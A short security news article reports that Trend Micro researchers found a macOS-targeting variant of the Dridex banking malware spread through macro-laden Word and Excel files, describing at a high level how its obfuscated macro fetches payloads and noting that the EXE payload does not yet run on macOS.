Researchers at Trend Micro have discovered a new variant of the Dridex banking malware targeting macOS users with a new technique involving sending documents embedded with malicious macros. These documents include malicious Word and Excel files.
The first sample appeared on Virus Total in 2019, but detections peaked later in December 2022. That said, the final payload delivers an EXE file, which is incompatible with a macOS environment. This led the researchers to believe that the variant is still in the testing stages and hasn’t fully been adapted to macOS yet.
Additionally, the malware does overwrite document files that continue to carry these malicious macros. This indicates that there can be further modifications down the road that can make the malware compatible with macOS.
As for the malicious document itself, the affected .DOC file was first discovered in 2015 and used the ThisDocument object that includes an auto-executing macro which then calls the malicious functions.
This code, obfuscated in plain hexadecimal, attempts to connect to a remote server to fetch additional payloads on the target machine, including the aforementioned EXE file. The link to this remote server is further obfuscated using basic string encryption.
Dridex is a rather old malware that is still actively used in attacks against financial institutions. It started as a banking trojan that exclusively targeted Windows machines and has since evolved to include information-stealing and even botnet capabilities.
According to Check Point researchers, Dridex was the fourth most prevalent malware variant in 2021 and has continued to evolve, keeping itself relevant. It was also one of the most common malware to abuse the log4j vulnerability in December 2021.
While macOS users are safe at the moment, primarily because the malware’s final payload isn’t compatible with macOS, the fact that it can deliver a payload at all is concerning and can cause further security issues down the road.
In the News: Word, Outlook, Bing might soon be powered by ChatGPT
